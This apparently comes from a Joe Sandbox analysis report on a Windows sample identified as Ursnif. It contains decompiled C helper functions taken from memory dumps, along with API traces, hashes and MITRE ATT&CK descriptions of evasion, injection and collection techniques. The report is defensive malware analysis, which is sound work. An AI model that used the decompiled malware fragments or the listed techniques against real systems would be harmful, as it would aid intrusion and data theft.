				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x07f79ff6
0x07f79fff
0x07f7a00f
0x07f7a00f
0x07f7a014
0x07f7a019
0x00000000
0x00000000
0x07f7a009
0x07f7a009
0x07f7a01b
0x07f7a020
0x07f7a024
0x07f7a037
0x07f7a03d
0x07f7a03d
0x07f7a046
0x07f7a048
0x07f7a04c
0x07f7a052

APIs

RtlEnterCriticalSection.NTDLL(08A29570), ref: 07F79FFF
Sleep.KERNEL32(0000000A,?,07F730F3), ref: 07F7A009
HeapFree.KERNEL32(00000000,?,?,07F730F3), ref: 07F7A037
RtlLeaveCriticalSection.NTDLL(08A29570), ref: 07F7A04C

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: fb76c3b56d505b387cddf8ee440c8c2078a56e52381337396586297912cd3f60
Instruction ID: 23f3d3e238970b5de2eacc827d03b4654e311dc2b824536e39a06215a650e09a
Opcode Fuzzy Hash: fb76c3b56d505b387cddf8ee440c8c2078a56e52381337396586297912cd3f60
Instruction Fuzzy Hash: 99F0FEB4B001059FE7148F78E84AF2977E4AF0970AB49844AF906C7350C738EC10DE20

Uniqueness

Uniqueness Score: -1.00%

Function 07F78CFA, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E07F78CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E07F71525(_t2);
				if(_t34 != 0) {
					_t30 = E07F71525(_t28);
					if(_t30 == 0) {
						E07F78B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E07F7A7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E07F7A7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x07f78cfa
0x07f78d04
0x07f78d06
0x07f78d0c
0x07f78d0c
0x07f78d15
0x07f78d19
0x07f78d25
0x07f78d29
0x07f78d9d
0x07f78d2b
0x07f78d2b
0x07f78d2f
0x07f78d34
0x07f78d39
0x07f78d53
0x07f78d42
0x07f78d42
0x07f78d46
0x07f78d49
0x07f78d4e
0x07f78d4e
0x07f78d58
0x07f78d80
0x07f78d86
0x07f78d89
0x07f78d5a
0x07f78d5c
0x07f78d64
0x07f78d6f
0x07f78d74
0x07f78d74
0x07f78d90
0x07f78d97
0x07f78d98
0x07f78d98
0x07f78d29
0x07f78da8

APIs

lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,07F79816,?,?,?,?,00000102,07F7937B,?,?,00000000), ref: 07F78D06

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

Part of subcall function 07F7A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,07F78D34,00000000,00000001,00000001,?,?,07F79816,?,?,?,?,00000102), ref: 07F7A7D0
Part of subcall function 07F7A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,07F79816,?,?,?,?,00000102,07F7937B,?,?,00000000,00000000), ref: 07F7A7DA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,07F79816,?,?,?,?,00000102,07F7937B,?), ref: 07F78D64
lstrcpy.KERNEL32(00000000,00000000), ref: 07F78D74
lstrcpy.KERNEL32(00000000,00000000), ref: 07F78D80

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 44fe7071c1b332df06af0163f89fd4ad02f9f3e64b8d2cde16b81ce572256577
Instruction ID: 1ee75e496c7e94edcf82764e72b64698e94a1c39f656110d69169c4dd172368d
Opcode Fuzzy Hash: 44fe7071c1b332df06af0163f89fd4ad02f9f3e64b8d2cde16b81ce572256577
Instruction Fuzzy Hash: 5E21A2F250425AEFCB025F79CC88AAE7FB8EF16290F198056F8059B211DB34C900C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07F7272D, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F7272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E07F71525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x07f72742
0x07f72746
0x07f72750
0x07f72755
0x07f7275a
0x07f7275c
0x07f72764
0x07f72769
0x07f72777
0x07f7277c
0x07f72786

APIs

lstrlenW.KERNEL32(004F0053,?,75145520,00000008,08A2935C,?,07F75398,004F0053,08A2935C,?,?,?,?,?,?,07F77CCB), ref: 07F7273D
lstrlenW.KERNEL32(07F75398,?,07F75398,004F0053,08A2935C,?,?,?,?,?,?,07F77CCB), ref: 07F72744

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

memcpy.NTDLL(00000000,004F0053,751469A0,?,?,07F75398,004F0053,08A2935C,?,?,?,?,?,?,07F77CCB), ref: 07F72764
memcpy.NTDLL(751469A0,07F75398,00000002,00000000,004F0053,751469A0,?,?,07F75398,004F0053,08A2935C), ref: 07F72777

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 2b05533143c4c702a90f9644ce81a4ad32533016ce6b46d9ef2c9c044fc0c25d
Instruction ID: 09ca570544ec1cf8fdc10ae395ad212869981058630038228e07a0665ff11d4d
Opcode Fuzzy Hash: 2b05533143c4c702a90f9644ce81a4ad32533016ce6b46d9ef2c9c044fc0c25d
Instruction Fuzzy Hash: F0F037B2900119FBCB11AFA9CC85C9E7BADEF092947154062ED04D7205EA35EA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07F7A677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(08A29B78,00000000,00000000,74ECC740,07F79DCB,00000000), ref: 07F7A687
lstrlen.KERNEL32(?), ref: 07F7A68F

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

lstrcpy.KERNEL32(00000000,08A29B78), ref: 07F7A6A3
lstrcat.KERNEL32(00000000,?), ref: 07F7A6AE

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: d8628adda5edfea8c977d5a427426ecacc4e53c07d476de47dc748d49412864e
Instruction ID: a534cfe697327be39738157713b58fc08712781a4a72895fcff754c1c16ca1c4
Opcode Fuzzy Hash: d8628adda5edfea8c977d5a427426ecacc4e53c07d476de47dc748d49412864e
Instruction Fuzzy Hash: 36E0EDB3901629A7C6119AB9AC48C9BBAADEF99656709441AF601D3210C7299805CBF1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report yRqHWQ91dT

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Function 00403348, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 0040535C, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00403CA7, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 0040390A, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EA1, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181
memoryCOMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 0040521E, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004030D8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166
COMMON

Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 004052F0, Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004041C7, Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Function 00403300, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004041B0, Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Function 0040419D, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00401F7B, Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Function 00403830, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Function 00405ABA, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Function 0040460D, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 00406945, Relevance: .3, Instructions: 334
COMMONCrypto

Function 0040711C, Relevance: .3, Instructions: 300
COMMONCrypto

Function 00404B80, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Function 004042E6, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Function 00405D66, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Function 0040618A, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 004063D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Function 004041E2, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre